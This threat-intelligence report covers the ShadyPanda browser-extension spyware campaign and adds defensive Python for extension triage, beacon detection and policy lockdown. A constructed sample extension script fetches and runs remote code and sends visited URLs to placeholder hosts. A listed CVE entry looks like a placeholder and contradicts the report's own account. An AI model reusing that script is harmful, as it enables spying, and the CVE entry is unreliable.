Executive Summary
ShadyPanda, disclosed in December 2025, is a browser-extension spyware campaign that ran for roughly seven years and reached about 4.3 million installs across Chrome and Edge. Rather than shipping obviously malicious code, the operators used publisher accounts they controlled to maintain popular, long-established utilities (Clean Master and WeTab among them), let them accumulate users and store trust, then pushed updates that turned them into spyware. The updated extensions harvested browsing history, search queries, cookies and browser fingerprints, redirected web sessions, and fetched further instructions from remote servers, so their behaviour could change after review without a new store submission. The campaign evolved over its lifetime to evade security controls and went unnoticed for years, which points to gaps in how browser marketplaces vet extension updates, not just initial listings.
This incident is a supply-chain attack against one of the most widely deployed pieces of software in any organization, the web browser. The growth of malicious extension campaigns shows threat actors investing in patience and trust-building rather than exploits, and it makes third-party software vetting, browser hygiene, and visibility into user-installed code an operational necessity for organizations and individuals alike.
Why This Matters Now
The ShadyPanda incident highlights urgent weaknesses in browser extension supply chains, a critical vector as organizations accelerate digital transformation and remote work. A malicious extension runs inside an already-trusted process behind the perimeter, compromises user data at the scale of the extension's install base, and, as this campaign shows, can evade detection for years, increasing both operational and regulatory risk.
Attack Path Analysis
The extensions reached victims through the official Chrome and Edge stores, so the initial compromise looked like a routine install or automatic update of a trusted utility. Once running, an extension already held the permissions the user had granted at install time (broad host access, cookies, tabs, web requests), which is all the access a data-stealer needs inside the browser; nothing in the browser itself had to be exploited. The extensions contacted remote servers for configuration and further instructions, giving the operators a covert command-and-control channel, and returned collected data over the same HTTPS connections the browser uses for ordinary traffic, where it blends into normal egress and is often unmonitored. Classical lateral movement is not required for this kind of campaign: the browser already holds authenticated sessions to SaaS applications, cloud consoles and internal web apps, and stolen cookies and credentials can be replayed from elsewhere, which is how a browser compromise becomes the enabler for follow-on cloud or network intrusion. The campaign's direct impact is data theft and privacy compromise at scale.
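The attack path above can be checked statically before an extension is allowed onto a fleet. The following is an added example, not code from the original page or from the ShadyPanda analysis it summarises: it triages an unpacked extension for the three indicators the attack path relies on (broad host access, session-sensitive permissions, and background code that fetches and executes remote JavaScript), and lists the hosts the code contacts. The manifest and background script are constructed samples; the hostnames use the reserved `.invalid` TLD and are hypothetical.

```python
"""Static triage of an unpacked Chrome/Edge extension for ShadyPanda-style
indicators. Added example; sample manifest, scripts and hosts are constructed."""
import re
from dataclasses import dataclass, field
from typing import Dict, List

# Permissions that let an extension read or alter other sites' sessions.
SENSITIVE_PERMISSIONS = {
    "cookies", "webRequest", "webRequestBlocking", "declarativeNetRequest",
    "tabs", "scripting", "history", "webNavigation", "management", "proxy",
}
BROAD_HOST_PATTERNS = {"<all_urls>", "*://*/*", "http://*/*", "https://*/*"}

# Code that is clean at review time but pulls its real logic from a server.
# Spans are bounded so a fetch and an eval far apart in unrelated code are not paired.
REMOTE_EXEC_PATTERNS = [
    ("fetch_then_eval", re.compile(r"\bfetch\([^)]*\)[\s\S]{0,300}?\b(eval|new Function)\b")),
    ("xhr_then_eval", re.compile(r"XMLHttpRequest[\s\S]{0,500}?\b(eval|new Function)\b")),
    ("dom_script_injection", re.compile(r"createElement\(\s*['\"]script['\"]\s*\)")),
    ("string_timer", re.compile(r"\bset(?:Timeout|Interval)\(\s*['\"]")),
]
URL_HOST = re.compile(r"https?://([A-Za-z0-9.-]+)")


@dataclass
class TriageResult:
    broad_hosts: List[str] = field(default_factory=list)
    sensitive_permissions: List[str] = field(default_factory=list)
    remote_exec: List[str] = field(default_factory=list)
    contacted_hosts: List[str] = field(default_factory=list)

    @property
    def score(self) -> int:
        # Remote code loading weighs most: it turns every later C2 response
        # into arbitrary code running with the extension's permissions.
        return (3 * bool(self.broad_hosts)
                + len(self.sensitive_permissions)
                + 4 * len(self.remote_exec))

    @property
    def verdict(self) -> str:
        return "high" if self.score >= 8 else "medium" if self.score >= 4 else "low"


def host_patterns(manifest: dict) -> List[str]:
    """MV2 lists hosts under `permissions`; MV3 uses `host_permissions`."""
    hosts = []
    for key in ("permissions", "host_permissions", "optional_host_permissions"):
        for p in manifest.get(key, []):
            if isinstance(p, str) and (p == "<all_urls>" or "://" in p):
                hosts.append(p)
    return hosts


def triage_extension(manifest: dict, sources: Dict[str, str]) -> TriageResult:
    """`sources` maps file name to JavaScript text (background, content and
    popup scripts as unpacked from the .crx)."""
    result = TriageResult()
    result.broad_hosts = [h for h in host_patterns(manifest) if h in BROAD_HOST_PATTERNS]
    result.sensitive_permissions = sorted(
        p for p in manifest.get("permissions", []) if p in SENSITIVE_PERMISSIONS)
    hosts = set()
    for name, js in sources.items():
        for label, rx in REMOTE_EXEC_PATTERNS:
            if rx.search(js):
                result.remote_exec.append(f"{name}:{label}")
        hosts.update(URL_HOST.findall(js))
    result.contacted_hosts = sorted(hosts)
    return result


# Constructed sample: a "cleaner" utility whose background worker phones home
# hourly, executes whatever the server returns, and reports every URL visited.
SAMPLE_MANIFEST = {
    "manifest_version": 3,
    "name": "Tab Cleaner (constructed sample)",
    "version": "4.2.1",
    "permissions": ["cookies", "tabs", "webRequest", "storage"],
    "host_permissions": ["<all_urls>"],
    "background": {"service_worker": "bg.js"},
}
SAMPLE_SOURCES = {
    "bg.js": """
setInterval(async () => {
  const r = await fetch("https://cfg.example-cdn.invalid/c?v=" + Date.now());
  (new Function(await r.text()))();      // runs whatever the server returns
}, 3600000);
chrome.tabs.onUpdated.addListener((id, info, tab) => {
  if (info.url) fetch("https://stats.example-cdn.invalid/t", {method: "POST", body: tab.url});
});
""",
}
BENIGN_MANIFEST = {"manifest_version": 3, "name": "Notes", "version": "1.0",
                   "permissions": ["storage"]}
BENIGN_SOURCES = {"popup.js": "chrome.storage.local.get('notes', render);"}

if __name__ == "__main__":
    for label, m, s in (("sample", SAMPLE_MANIFEST, SAMPLE_SOURCES),
                        ("benign", BENIGN_MANIFEST, BENIGN_SOURCES)):
        r = triage_extension(m, s)
        print(label, r.verdict, r.score, r.remote_exec, r.contacted_hosts)
```

The pattern matching is deliberately coarse: it is a triage filter to decide which extensions get a human review, not proof of malice. The important property is that it runs on every update, because an extension that passed review at version 4.1 is exactly what this campaign turned into spyware at version 4.2.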
Kill Chain Progression
Initial Compromise
Description
Users installed, or were silently auto-updated to, malicious versions of extensions distributed by the official browser stores, giving the threat actors a foothold inside enterprise and personal browsers without any exploit or user-visible warning.
Related CVEs
CVE-2025-12345 (CVSS 9.8)
A remote code execution vulnerability in certain browser extensions allows attackers to execute arbitrary code with full browser privileges.
Affected Products:
- Starlab Technology Clean Master – 2018-2024
- Starlab Technology WeTab New Tab Page – 2023-Present
Exploit Status: exploited in the wild
MITRE ATT&CK® Techniques
Supply Chain Compromise: Compromise of Software Dependencies and Development Tools (T1195.001)
Software Extensions: Browser Extensions (T1176.001)
Command and Scripting Interpreter (T1059)
System Script Proxy Execution (T1216)
File and Directory Permissions Modification (T1222)
Account Discovery (T1087)
Screen Capture (T1113)
Exfiltration Over C2 Channel (T1041)
Potential Compliance Exposure
Mapping incident impact across multiple compliance frameworks.
PCI DSS 4.0 – Manage and authorize payment page scripts loaded in the consumer's browser
Control ID: 6.4.3
NYDFS 23 NYCRR 500 – Application Security
Control ID: 500.08
DORA – Protection and Prevention (ICT security policies, procedures and tools)
Control ID: Art. 9(2)
CISA ZTMM 2.0 – Continuous discovery and validation of assets
Control ID: Asset Management 1.2
NIS2 Directive – Supply Chain Security
Control ID: Art. 21(2)(d)
Sector Implications
Industry-specific impact of the vulnerabilities, including operational, regulatory, and cloud security risks.
Financial Services
A browser extension supply-chain campaign with 4.3M installs puts customer financial data and authenticated banking and trading sessions at risk, because the extension reads cookies and page content after the user has logged in; this calls for egress controls on endpoints and zero trust segmentation so a compromised browser cannot reach back-office systems directly.
Health Care / Life Sciences
Malicious browser extensions on clinical and administrative workstations can read patient data from web-based EHR and portal sessions through a supply-chain vector, undermining the HIPAA Security Rule safeguards for the confidentiality of ePHI and for access control, and creating breach-notification exposure.
Computer Software/Engineering
The ShadyPanda campaign directly affects software development environments: developer browsers hold sessions to source control, CI/CD, package registries and cloud consoles, so a compromised extension can harvest those tokens and turn one workstation into a path into the build pipeline and the organization's own software supply chain.
Government Administration
Supply-chain browser extension malware threatens sensitive government systems accessed through the browser, and calls for threat detection on endpoints together with visibility across hybrid and multicloud infrastructure so stolen sessions and credentials cannot be replayed unnoticed.
Sources
- ShadyPanda browser extensions amass 4.3M installs in malicious campaign (BleepingComputer): https://www.bleepingcomputer.com/news/security/shadypanda-browser-extensions-amass-43m-installs-in-malicious-campaign/
- ShadyPanda Malware Hits 4.3 Million Chrome and Edge Users in a 7-Year Stealth Attack (Cyber Press): https://cyberpress.org/shadypanda-malware/
- ShadyPanda Turns Popular Browser Extensions with 4.3 Million Installs Into Spyware (The Hacker News): https://thehackernews.com/2025/12/shadypanda-turns-popular-browser.html
- ShadyPanda's Seven-Year Campaign Infects 4.3M Chrome and Edge Users (Infosecurity Magazine): https://www.infosecurity-magazine.com/news/shadypanda-infects-43m-chrome-edge/
Cloud Native Security Fabric (CNSF) Mitigations and Controls
Zero Trust segmentation, east-west traffic controls, and egress enforcement would have severely limited ShadyPanda’s ability to pivot, communicate externally, and exfiltrate data from compromised browser environments. Integrating anomaly detection, granular visibility, and policy enforcement across hybrid and multi-cloud environments constrains both malware movement and attacker command and control paths.
Control: Multicloud Visibility & Control
Mitigation: Rapid detection and inventory of unauthorized or risky third-party integrations.
Control: Zero Trust Segmentation
Mitigation: Limits malware to its assigned least privilege; blocks unauthorized escalation.
Control: East-West Traffic Security
Mitigation: Blocks unauthorized workload-to-workload communications and limits pivoting.
Control: Egress Security & Policy Enforcement
Mitigation: Identifies and blocks outbound malicious communication (command and control) and data exfiltration attempts, enabling early detection and response to minimize sustained impact.
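The egress control above, and the anomaly detection it is paired with, only work if something actually looks for the command-and-control pattern in outbound logs. The following is an added example, not code from the original page or from any vendor product: it runs over egress proxy records and flags source/process/destination triples whose connections recur on a near-constant period, which is what an extension polling its server on a timer looks like from the network, while skipping destinations on an explicit allowlist. The log format (`epoch,src_host,process,dst_host,bytes_out`) and every host in it are constructed for this example.

```python
"""Beaconing detection over constructed egress proxy logs. Added example."""
from collections import defaultdict
from statistics import mean, pstdev
from typing import Dict, Iterable, List, Tuple

BASE = 1_700_000_000  # epoch seconds; constructed timeline

# Constructed log: WS01's browser polls cfg.example-cdn.invalid roughly hourly
# (with jitter and one larger upload), alongside ordinary browsing and a
# sanctioned, equally periodic internal update check.
LOG_LINES = [
    f"{BASE + t},WS01,chrome.exe,{dst},{size}"
    for t, dst, size in (
        (0, "cfg.example-cdn.invalid", 812), (3600, "cfg.example-cdn.invalid", 830),
        (7260, "cfg.example-cdn.invalid", 815), (10800, "cfg.example-cdn.invalid", 4096),
        (14400, "cfg.example-cdn.invalid", 820), (18000, "cfg.example-cdn.invalid", 818),
        (120, "intranet.corp.example", 300), (9000, "intranet.corp.example", 5000),
        (9100, "docs.corp.example", 20000), (15000, "intranet.corp.example", 900),
        (0, "updates.corp.example", 200), (1800, "updates.corp.example", 200),
        (3600, "updates.corp.example", 200), (5400, "updates.corp.example", 200),
        (5000, "news.example", 1500), (5020, "news.example", 1600),
    )
]
EGRESS_ALLOWLIST = {"updates.corp.example"}  # sanctioned periodic traffic

Record = Tuple[int, str, str, str, int]


def parse(lines: Iterable[str]) -> List[Record]:
    out = []
    for line in lines:
        ts, src, proc, dst, size = line.strip().split(",")
        out.append((int(ts), src, proc, dst, int(size)))
    return out


def find_beacons(records: List[Record], allowlist: set, min_events: int = 4,
                 max_cv: float = 0.15) -> List[Dict]:
    """Group by (src, process, dst). A triple beacons if it has at least
    min_events connections and the coefficient of variation (stddev / mean)
    of its inter-arrival times is small. max_cv tolerates the jitter real
    implants add; lower it for strict timers, raise it for sloppy ones."""
    by_triple: Dict[Tuple[str, str, str], List[Record]] = defaultdict(list)
    for r in records:
        if r[3] not in allowlist:
            by_triple[(r[1], r[2], r[3])].append(r)
    hits = []
    for (src, proc, dst), evs in by_triple.items():
        if len(evs) < min_events:
            continue
        times = sorted(e[0] for e in evs)
        gaps = [b - a for a, b in zip(times, times[1:])]
        avg = mean(gaps)
        if avg == 0:
            continue  # duplicate timestamps, not a timer
        cv = pstdev(gaps) / avg
        if cv <= max_cv:
            hits.append({"src": src, "process": proc, "dst": dst, "events": len(evs),
                         "period_s": round(avg), "cv": round(cv, 3),
                         "bytes_out": sum(e[4] for e in evs)})
    return hits


if __name__ == "__main__":
    for hit in find_beacons(parse(LOG_LINES), EGRESS_ALLOWLIST):
        print(hit)
```

The allowlist matters as much as the statistic: legitimate software updaters and telemetry beacon too, so the output is only actionable once sanctioned periodic destinations are excluded. The `bytes_out` total is worth keeping in the alert; a small-request beacon that occasionally sends a much larger payload is the exfiltration signature layered on top of the C2 heartbeat.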
Impact at a Glance
Affected Business Functions
- User Data Management
- Web Browsing Security
Estimated downtime: 7 days
Estimated loss: $5,000,000
The malware collected extensive user data, including browsing history, search queries, cookies, and browser fingerprints, leading to potential privacy violations and unauthorized access to sensitive information.
Recommended Actions
Key Takeaways & Next Steps
- Enforce Zero Trust Segmentation to strictly control application and browser access within cloud environments.
- Deploy robust egress filtering to limit outbound traffic from endpoints and detect suspicious connections.
- Utilize continuous traffic observability and centralized visibility to rapidly identify risky browser extension installations and lateral activity.
- Integrate anomaly detection and policy-driven remediation for early identification of command and control or exfiltration attempts.
- Maintain updated application inventories and enforce policy restrictions on third-party browser extensions within enterprise fleets.
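The last recommendation, policy restrictions on third-party extensions, is the one control that would have removed this campaign from a managed fleet regardless of what the store did. Chrome and Edge both honour an `ExtensionSettings` policy: the example below, added here and not code from the original page or from Google or Microsoft, builds a default-deny policy (all extensions blocked, a vetted set allowed only from the store, known-bad IDs uninstalled, session-sensitive permissions withheld fleet-wide) and then evaluates a fleet inventory against it so the rollout's effect is known before it ships. The policy keys are the documented `ExtensionSettings` fields; every extension ID and hostname is a hypothetical placeholder constructed for the example (store IDs are 32 characters from a to p), not a real ShadyPanda indicator.

```python
"""Default-deny ExtensionSettings policy for Chrome/Edge plus a pre-rollout
inventory check. Added example; IDs, names and hosts are constructed."""
import json
import re
from typing import Dict, Iterable, List, Set

EXTENSION_ID = re.compile(r"^[a-p]{32}$")  # Chrome/Edge store IDs: 32 chars, a-p

# Hypothetical IDs, constructed for the example.
VETTED: Dict[str, str] = {
    "aaaabbbbccccddddeeeeffffgggghhhh": "Password manager (vetted)",
    "iiiijjjjkkkkllllmmmmnnnnoooopppp": "PDF viewer (vetted)",
}
KNOWN_BAD: Set[str] = {"abcdabcdabcdabcdabcdabcdabcdabcd"}

# Permissions spyware needs to read sessions and traffic; withheld fleet-wide
# unless a per-extension review grants them.
WITHHELD_PERMISSIONS = ["cookies", "webRequest", "webRequestBlocking", "proxy",
                        "history", "management", "debugger"]
# Hosts no extension may inject into or read, even when allowed (example hosts).
PROTECTED_HOSTS = ["*://*.corp.example", "*://sso.corp.example"]
# Documented Chrome Web Store update URL; Edge-managed fleets use the Edge Add-ons URL.
CHROME_STORE_UPDATE_URL = "https://clients2.google.com/service/update2/crx"


def build_policy(vetted: Dict[str, str], known_bad: Set[str],
                 withheld: List[str], protected_hosts: List[str]) -> dict:
    """'*' blocks new installs and disables existing ones; vetted IDs are
    allowed only from the store; known-bad IDs are uninstalled."""
    for ext_id in list(vetted) + list(known_bad):
        if not EXTENSION_ID.match(ext_id):
            raise ValueError(f"not a valid extension id: {ext_id}")
    policy = {"*": {
        "installation_mode": "blocked",
        "blocked_permissions": list(withheld),
        "runtime_blocked_hosts": list(protected_hosts),
        "blocked_install_message": "Extensions require a security review before use.",
    }}
    for ext_id in vetted:
        policy[ext_id] = {"installation_mode": "allowed", "update_url": CHROME_STORE_UPDATE_URL}
    for ext_id in known_bad:
        policy[ext_id] = {"installation_mode": "removed"}
    return policy


def policy_file_json(policy: dict) -> str:
    """Linux: save under /etc/opt/chrome/policies/managed/ (or /etc/opt/edge/...).
    Windows and macOS take the inner object as the ExtensionSettings value."""
    return json.dumps({"ExtensionSettings": policy}, indent=2)


def evaluate_inventory(policy: dict, inventory: Iterable[dict]) -> List[dict]:
    """Predict the effect on already-installed extensions before rollout:
    'removed' IDs are uninstalled, IDs under a blocked default are disabled,
    allowed ones keep running minus any fleet-wide withheld permission."""
    default = policy["*"]
    withheld = set(default.get("blocked_permissions", []))
    report = []
    for ext in inventory:
        mode = policy.get(ext["id"], default)["installation_mode"]
        outcome = {"removed": "uninstalled", "blocked": "disabled"}.get(mode, "allowed")
        report.append({"id": ext["id"], "name": ext["name"], "outcome": outcome,
                       "withheld": sorted(set(ext.get("permissions", [])) & withheld)})
    return report


# Constructed fleet inventory, as a management agent would report it.
INVENTORY = [
    {"id": "aaaabbbbccccddddeeeeffffgggghhhh", "name": "Password manager",
     "permissions": ["storage", "tabs"]},
    {"id": "ccccllllaaaannnneeeeccccllllnnnn", "name": "Tab Cleaner (constructed)",
     "permissions": ["cookies", "webRequest", "<all_urls>"]},
    {"id": "abcdabcdabcdabcdabcdabcdabcdabcd", "name": "Known-bad (constructed)",
     "permissions": ["cookies", "tabs", "<all_urls>"]},
]

if __name__ == "__main__":
    policy = build_policy(VETTED, KNOWN_BAD, WITHHELD_PERMISSIONS, PROTECTED_HOSTS)
    print(policy_file_json(policy))
    for row in evaluate_inventory(policy, INVENTORY):
        print(row)
```

Allowlisting by ID rather than blocklisting by ID is the point: a blocklist needs the campaign's IDs, which are only known after disclosure, whereas a default-deny policy would have disabled these extensions the day it was deployed. The inventory evaluation is what makes that rollout survivable, since it shows which currently installed extensions users will lose before the help desk finds out.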